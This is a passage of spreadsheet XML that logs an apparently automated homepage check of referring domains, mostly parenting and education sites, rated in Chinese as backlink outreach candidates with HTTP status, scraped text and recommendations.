      <x:c r="S74" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T74" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://haleywynndesigns.com</x:v>
      </x:c>
    </x:row>
    <x:row r="75">
      <x:c r="A75" s="18" t="str">
        <x:v>74</x:v>
      </x:c>
      <x:c r="B75" s="19" t="str">
        <x:v>chinatigoo.com</x:v>
      </x:c>
      <x:c r="C75" s="19" t="str">
        <x:v>https://chinatigoo.com</x:v>
      </x:c>
      <x:c r="D75" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E75" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F75" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G75" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H75" s="19" t="str">
        <x:v>http://chinatigoo.com/</x:v>
      </x:c>
      <x:c r="I75" s="19" t="str">
        <x:v>Sorry, the website has been stopped</x:v>
      </x:c>
      <x:c r="J75" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K75" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L75" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M75" s="19" t="str">
        <x:v>http://chinatigoo.com/</x:v>
      </x:c>
      <x:c r="N75" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O75" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P75" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q75" s="21" t="str">
        <x:v>Sorry, the website has been stopped Website not found Sorry, Please confirm that this domain name has been bound to your website.</x:v>
      </x:c>
      <x:c r="R75" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S75" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T75" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://chinatigoo.com
http://chinatigoo.com</x:v>
      </x:c>
    </x:row>
    <x:row r="76">
      <x:c r="A76" s="18" t="str">
        <x:v>75</x:v>
      </x:c>
      <x:c r="B76" s="19" t="str">
        <x:v>ourlittleplaynest.com</x:v>
      </x:c>
      <x:c r="C76" s="19" t="str">
        <x:v>https://ourlittleplaynest.com</x:v>
      </x:c>
      <x:c r="D76" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E76" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F76" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G76" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H76" s="19" t="str">
        <x:v>https://ourlittleplaynest.com/</x:v>
      </x:c>
      <x:c r="I76" s="19" t="str">
        <x:v>Positive Parenting with the brain in mind | Jacinth Liew Singapore</x:v>
      </x:c>
      <x:c r="J76" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K76" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L76" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M76" s="19" t="str">
        <x:v>https://ourlittleplaynest.com/</x:v>
      </x:c>
      <x:c r="N76" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O76" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P76" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q76" s="21" t="str">
        <x:v>I help parents connect with their children through brain-based,positive parenting strategies without yelling and punishing.Click here to view Positive Parenting with the brain in mind | Jacinth Liew Singapore Skip to content Menu Home About me Blog Online Courses Beyond Labelling Emotions From Yelling To Connecting Raising a Resilient Child Workshop Siblings Workshop Power Struggles Workshop Be.Tween Community (for parents with kids 7-12yo) Free Resources Members Login I HELP PARENTS yell less and connect more with their children. I help you partner , not punish your tween Free Resources here! Enrollment is open from 20-27 April 2026! From Yelling To Connecting Click below to get your free resources. Let’s learn and grow together! 4-week S ignature Online Course now OPEN! Sign up from 15 – 22 April 2025! FREE RESOURCES TO GET YOU </x:v>
      </x:c>
      <x:c r="R76" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S76" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T76" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://ourlittleplaynest.com</x:v>
      </x:c>
    </x:row>
    <x:row r="77">
      <x:c r="A77" s="18" t="str">
        <x:v>76</x:v>
      </x:c>
      <x:c r="B77" s="19" t="str">
        <x:v>onefestivemama.com</x:v>
      </x:c>
      <x:c r="C77" s="19" t="str">
        <x:v>https://onefestivemama.com</x:v>
      </x:c>
      <x:c r="D77" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E77" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F77" s="20" t="str">
        <x:v>500</x:v>
      </x:c>
      <x:c r="G77" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H77" s="19" t="str">
        <x:v>https://onefestivemama.com/</x:v>
      </x:c>
      <x:c r="I77" s="19" t="str">
        <x:v>WordPress &amp;rsaquo; Error</x:v>
      </x:c>
      <x:c r="J77" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K77" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L77" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M77" s="19" t="str">
        <x:v>https://onefestivemama.com/</x:v>
      </x:c>
      <x:c r="N77" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O77" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P77" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q77" s="21" t="str">
        <x:v>WordPress &amp;rsaquo; Error There has been a critical error on this website. Learn more about troubleshooting WordPress.</x:v>
      </x:c>
      <x:c r="R77" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S77" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T77" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://onefestivemama.com</x:v>
      </x:c>
    </x:row>
    <x:row r="78">
      <x:c r="A78" s="18" t="str">
        <x:v>77</x:v>
      </x:c>
      <x:c r="B78" s="19" t="str">
        <x:v>linkreducation.com</x:v>
      </x:c>
      <x:c r="C78" s="19" t="str">
        <x:v>https://linkreducation.com</x:v>
      </x:c>
      <x:c r="D78" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E78" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F78" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G78" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H78" s="19" t="str">
        <x:v>https://www.linkreducation.com/en/</x:v>
      </x:c>
      <x:c r="I78" s="19" t="str">
        <x:v>Linkr | Digital Home with Integrated LMS for Experiential Learning &amp; Virtual Exchange</x:v>
      </x:c>
      <x:c r="J78" s="19" t="str">
        <x:v>平台/个人发布平台</x:v>
      </x:c>
      <x:c r="K78" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L78" s="19" t="str">
        <x:v>平台自建内容</x:v>
      </x:c>
      <x:c r="M78" s="19" t="str">
        <x:v>https://www.linkreducation.com/en/</x:v>
      </x:c>
      <x:c r="N78" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O78" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P78" s="21" t="str">
        <x:v>这是内容发布或个人资料平台，不是自然获得的编辑型外链目标。</x:v>
      </x:c>
      <x:c r="Q78" s="21" t="str">
        <x:v>Linkr provides a digital home with integrated LMS for experiential learning and virtual exchange programs. The platform empowers education organizations worldwide to galvanize, engage, and grow their learning communities through meaningful connections and transformative educational experiences. Linkr | Digital Home with Integrated LMS for Experiential Learning &amp; Virtual Exchange</x:v>
      </x:c>
      <x:c r="R78" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S78" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T78" s="21" t="str">
        <x:v>不能把平台自身的用户页面当成高质量目录外链。 | 请求: https://linkreducation.com</x:v>
      </x:c>
    </x:row>
    <x:row r="79">
      <x:c r="A79" s="18" t="str">
        <x:v>78</x:v>
      </x:c>
      <x:c r="B79" s="19" t="str">
        <x:v>gayweddingsmag.com</x:v>
      </x:c>
      <x:c r="C79" s="19" t="str">
        <x:v>https://gayweddingsmag.com</x:v>
      </x:c>
      <x:c r="D79" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E79" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F79" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G79" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H79" s="19" t="str">
        <x:v>https://gayweddingsmag.com/</x:v>
      </x:c>
      <x:c r="I79" s="19" t="str">
        <x:v>Gay Weddings &amp; Marriage Magazine</x:v>
      </x:c>
      <x:c r="J79" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K79" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L79" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M79" s="19" t="str">
        <x:v>https://gayweddingsmag.com/</x:v>
      </x:c>
      <x:c r="N79" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O79" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P79" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q79" s="21" t="str">
        <x:v>Gay Weddings &amp; Marriage Magazine Skip to Content Gay Weddings &amp; Marriage Magazine Home Blog Contact Privacy Policy About 21 Genius Ways To Organize Your Life For Cheap Embracing organization doesn’t have to break the bank. In fact, there are numerous ways to streamline your life without sacrificing a single dollar. To help you get started, I’ve compiled 21 budget-friendly strategies to get your living space in order. Not only will these initiatives leave you feeling empowered and stress-free, but they’ll also grant … Read More about 21 Genius Ways To Organize Your Life For Cheap 23 The Most Clever Closet Organization Hacks Rather than relying on chance, let’s dive into the world of closet or</x:v>
      </x:c>
      <x:c r="R79" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S79" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T79" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://gayweddingsmag.com</x:v>
      </x:c>
    </x:row>
    <x:row r="80">
      <x:c r="A80" s="18" t="str">
        <x:v>79</x:v>
      </x:c>
      <x:c r="B80" s="19" t="str">
        <x:v>montessoriintown.com</x:v>
      </x:c>
      <x:c r="C80" s="19" t="str">
        <x:v>https://montessoriintown.com</x:v>
      </x:c>
      <x:c r="D80" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E80" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F80" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G80" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H80" s="19" t="str">
        <x:v>https://www.montessoriintown.com/</x:v>
      </x:c>
      <x:c r="I80" s="19" t="str">
        <x:v>Montessori In Town &amp;mdash; Atlanta</x:v>
      </x:c>
      <x:c r="J80" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K80" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L80" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M80" s="19" t="str">
        <x:v>https://www.montessoriintown.com/</x:v>
      </x:c>
      <x:c r="N80" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O80" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P80" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q80" s="21" t="str">
        <x:v>Montessori In Town is an Atlanta based school, serving families of toddler, preschool, kindergarten, and elementary aged children. Now enrolling. Montessori In Town &amp;mdash; Atlanta Programs Toddler Primary Elementary Enrichment Summer Camps About Our School Why Montessori? Faculty &amp; Staff The Montessori Method Accreditation &amp; Affiliation Montessori FAQ Contact Us Instagram Admissions Admissions Tuition &amp; Fees Admissions FAQ Calendar Programs Toddler Primary Elementary Enrichment Summer Camps About Our School Why Montessori? Faculty &amp; Staff The Montessori Method Accreditation &amp; Affiliation Montessori FAQ Contact Us Instagram Admissions Admissions Tuition &amp; Fees Admissions FAQ Calendar Programs Welcome About Our School Vision landing New Page Admissions From the Community Programs SCROLL DOWN Programs The Montessori Method Dr. Maria Mon</x:v>
      </x:c>
      <x:c r="R80" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S80" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T80" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://montessoriintown.com</x:v>
      </x:c>
    </x:row>
    <x:row r="81">
      <x:c r="A81" s="18" t="str">
        <x:v>80</x:v>
      </x:c>
      <x:c r="B81" s="19" t="str">
        <x:v>45.11.3.231</x:v>
      </x:c>
      <x:c r="C81" s="19" t="str">
        <x:v>https://45.11.3.231:443</x:v>
      </x:c>
      <x:c r="D81" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E81" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F81" s="20" t="str">
        <x:v>400</x:v>
      </x:c>
      <x:c r="G81" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H81" s="19" t="str">
        <x:v>http://45.11.3.231:443/</x:v>
      </x:c>
      <x:c r="I81" s="19" t="str">
        <x:v>400 Bad Request</x:v>
      </x:c>
      <x:c r="J81" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K81" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L81" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M81" s="19" t="str">
        <x:v>http://45.11.3.231:443/</x:v>
      </x:c>
      <x:c r="N81" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O81" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P81" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q81" s="21" t="str">
        <x:v>400 Bad Request Bad Request Your browser sent a request that this server could not understand. Reason: You're speaking plain HTTP to an SSL-enabled server port. Instead use the HTTPS scheme to access this URL, please.</x:v>
      </x:c>
      <x:c r="R81" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S81" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T81" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://45.11.3.231:443
http://45.11.3.231:443</x:v>
      </x:c>
    </x:row>
    <x:row r="82">
      <x:c r="A82" s="18" t="str">
        <x:v>81</x:v>
      </x:c>
      <x:c r="B82" s="19" t="str">
        <x:v>familyfelicity.com</x:v>
      </x:c>
      <x:c r="C82" s="19" t="str">
        <x:v>https://familyfelicity.com</x:v>
      </x:c>
      <x:c r="D82" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E82" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F82" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G82" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H82" s="19" t="str">
        <x:v>https://familyfelicity.com/</x:v>
      </x:c>
      <x:c r="I82" s="19" t="str">
        <x:v>- FamilyFelicity.com</x:v>
      </x:c>
      <x:c r="J82" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K82" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L82" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M82" s="19" t="str">
        <x:v>https://familyfelicity.com/</x:v>
      </x:c>
      <x:c r="N82" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O82" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P82" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q82" s="21" t="str">
        <x:v>Welcome to Family Felicity! This company was designed to inform, encourage, and create a supportive community for mothers and their families. - FamilyFelicity.com Skip to content My Story About Donate Home About About Family Felicity My Story Blog Family Life Parenting Mom Life Motherhood Calm Mom Faith Events Songs of David Our Shop The Family Felicity Fund My Story Welcome to Family Felicity! Where families grow together… Family Felicity exists to inspire, equip, and encourage individuals and families as they grow together. Through educational resources, transformative programs, and community centered initiatives, we help people pursue healing, strengthen relationships, embrace personal growth, and create healthier, more connected homes where everyone can thrive! To learn more about the work we do, click here ! Top Categories Ab</x:v>
      </x:c>
      <x:c r="R82" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S82" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T82" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://familyfelicity.com</x:v>
      </x:c>
    </x:row>
    <x:row r="83">
      <x:c r="A83" s="18" t="str">
        <x:v>82</x:v>
      </x:c>
      <x:c r="B83" s="19" t="str">
        <x:v>thesltscrapbook.com</x:v>
      </x:c>
      <x:c r="C83" s="19" t="str">
        <x:v>https://thesltscrapbook.com</x:v>
      </x:c>
      <x:c r="D83" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E83" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F83" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G83" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H83" s="19" t="str">
        <x:v>https://thesltscrapbook.com/</x:v>
      </x:c>
      <x:c r="I83" s="19" t="str">
        <x:v>Early Intervention Speech Therapy Resources | SLT Scrapbook</x:v>
      </x:c>
      <x:c r="J83" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K83" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L83" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M83" s="19" t="str">
        <x:v>https://thesltscrapbook.com/</x:v>
      </x:c>
      <x:c r="N83" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O83" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P83" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q83" s="21" t="str">
        <x:v>Early Intervention Speech Therapy resources for SLPs and SLTs, including caregiver coaching tools and play-based strategies. Early Intervention Speech Therapy Resources | SLT Scrapbook Skip to content Home Early Intervention Early Intervention Caregiver Coaching Communication Temptations Early Language Strategies Play Based Interventions Late Talkers Early Intervention Activities EI Handouts Routine Based Interventions Blog Shop Online Shop TpT store About Contact Sign In My account 0 items Home Early Intervention Early Intervention Caregiver Coaching Communication Temptations Early Language Strategies Play Based Interventions Late Talkers Early Intervention Activities EI Handouts Routine Based Interventions Blog Shop Online Shop TpT store About Contact Sign In My account 0 items Explore Resources Read The EI Blog</x:v>
      </x:c>
      <x:c r="R83" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S83" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T83" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://thesltscrapbook.com</x:v>
      </x:c>
    </x:row>
    <x:row r="84">
      <x:c r="A84" s="18" t="str">
        <x:v>83</x:v>
      </x:c>
      <x:c r="B84" s="19" t="str">
        <x:v>azurefd.net</x:v>
      </x:c>
      <x:c r="C84" s="19" t="str">
        <x:v>https://azurefd.net</x:v>
      </x:c>
      <x:c r="D84" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E84" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F84" s="20"/>
      <x:c r="G84" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H84" s="19" t="str"/>
      <x:c r="I84" s="19" t="str"/>
      <x:c r="J84" s="19" t="str">
        <x:v>基础设施/搜索/异常域名</x:v>
      </x:c>
      <x:c r="K84" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L84" s="19" t="str">
        <x:v>referrer 噪声</x:v>
      </x:c>
      <x:c r="M84" s="19" t="str">
        <x:v>https://azurefd.net</x:v>
      </x:c>
      <x:c r="N84" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O84" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P84" s="21" t="str">
        <x:v>更像搜索、CDN、文档托管、镜像或异常 referrer，不是可开发的内容外链站点。</x:v>
      </x:c>
      <x:c r="Q84" s="21" t="str"/>
      <x:c r="R84" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S84" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T84" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://azurefd.net
http://azurefd.net</x:v>
      </x:c>
    </x:row>
    <x:row r="85">
      <x:c r="A85" s="18" t="str">
        <x:v>84</x:v>
      </x:c>
      <x:c r="B85" s="19" t="str">
        <x:v>cnreproductive.com</x:v>
      </x:c>
      <x:c r="C85" s="19" t="str">
        <x:v>https://cnreproductive.com</x:v>
      </x:c>
      <x:c r="D85" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E85" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F85" s="20"/>
      <x:c r="G85" s="19" t="str">
        <x:v>超时</x:v>
      </x:c>
      <x:c r="H85" s="19" t="str"/>
      <x:c r="I85" s="19" t="str"/>
      <x:c r="J85" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K85" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L85" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M85" s="19" t="str">
        <x:v>https://cnreproductive.com</x:v>
      </x:c>
      <x:c r="N85" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O85" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P85" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q85" s="21" t="str"/>
      <x:c r="R85" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S85" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T85" s="21" t="str">
        <x:v>timeout | timeout | 请求: https://cnreproductive.com
http://cnreproductive.com</x:v>
      </x:c>
    </x:row>
    <x:row r="86">
      <x:c r="A86" s="18" t="str">
        <x:v>85</x:v>
      </x:c>
      <x:c r="B86" s="19" t="str">
        <x:v>myboredtoddler.com</x:v>
      </x:c>
      <x:c r="C86" s="19" t="str">
        <x:v>https://myboredtoddler.com</x:v>
      </x:c>
      <x:c r="D86" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E86" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F86" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G86" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H86" s="19" t="str">
        <x:v>https://myboredtoddler.com/</x:v>
      </x:c>
      <x:c r="I86" s="19" t="str">
        <x:v>My Bored Toddler - Activities for Toddlers</x:v>
      </x:c>
      <x:c r="J86" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K86" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L86" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M86" s="19" t="str">
        <x:v>https://myboredtoddler.com/</x:v>
      </x:c>
      <x:c r="N86" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O86" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P86" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q86" s="21" t="str">
        <x:v>My Bored Toddler - Activities for Toddlers Skip to Content Search Search for: Close Search &amp;times; SEASONAL &amp;pr; SPRING AUTUMN/FALL WINTER SUMMER SPECIAL OCCASSIONS &amp;pr; Valentine's Day St Patrick's Day Easter Mother's Day Father's Day Halloween Thanksgiving Christmas Activities New Year's Eve AMAZON SHOP CONTACT US FACEBOOK GROUP SHOP PRINTABLES Activities for Toddlers If you are looking for easy toddler activities then start with this list of 50 EASY activities for toddlers. What are you looking for? SEARCH Toddler Weekly Activity Guides FREE weekly activity guides for toddlers - these toddler activity guides focus on one theme each week with daily activities to guide you. See more Toddler</x:v>
      </x:c>
      <x:c r="R86" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S86" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T86" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://myboredtoddler.com</x:v>
      </x:c>
    </x:row>
    <x:row r="87">
      <x:c r="A87" s="18" t="str">
        <x:v>86</x:v>
      </x:c>
      <x:c r="B87" s="19" t="str">
        <x:v>leday.cn</x:v>
      </x:c>
      <x:c r="C87" s="19" t="str">
        <x:v>https://leday.cn</x:v>
      </x:c>
      <x:c r="D87" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E87" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F87" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G87" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H87" s="19" t="str">
        <x:v>https://www.bing.com/?mkt=zh-CN</x:v>
      </x:c>
      <x:c r="I87" s="19" t="str">
        <x:v>搜索 - Microsoft 必应</x:v>
      </x:c>
      <x:c r="J87" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K87" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L87" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M87" s="19" t="str">
        <x:v>https://www.bing.com/?mkt=zh-CN</x:v>
      </x:c>
      <x:c r="N87" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O87" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P87" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q87" s="21" t="str">
        <x:v>使用 Microsoft 必应进行搜索，并利用 AI 的强大功能查找信息、浏览网页、图像、视频、地图等。为永远充满好奇心的人提供的智能搜索引擎。 搜索 - Microsoft 必应 图片 视频 翻译 地图 学术 视频 翻译 地图 学术 词典 MSN 小游戏 Microsoft 365 Outlook Word Excel PowerPoint OneNote Sway OneDrive 日历 人脉 了解必应 国内版 国际版 获取新版必应壁纸应用 传统海滩小屋，索思沃尔德，萨福克遗产海岸，英格兰 © stevendocwra/Getty Images 海岸边的缤纷色彩 反馈 © 2026 Microsoft 增值电信业务经营许可证：合字B2-20090007 京ICP备10036305号-7 京公网安备11010802047360号 隐私与 Cookie 法律声明 广告 关于我们的广告 帮助 反馈 登录 扫码下载 微软必应手机版 全球资源，有求必应</x:v>
      </x:c>
      <x:c r="R87" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S87" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T87" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://leday.cn</x:v>
      </x:c>
    </x:row>
    <x:row r="88">
      <x:c r="A88" s="18" t="str">
        <x:v>87</x:v>
      </x:c>
      <x:c r="B88" s="19" t="str">
        <x:v>roseclearfield.com</x:v>
      </x:c>
      <x:c r="C88" s="19" t="str">
        <x:v>https://roseclearfield.com</x:v>
      </x:c>
      <x:c r="D88" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
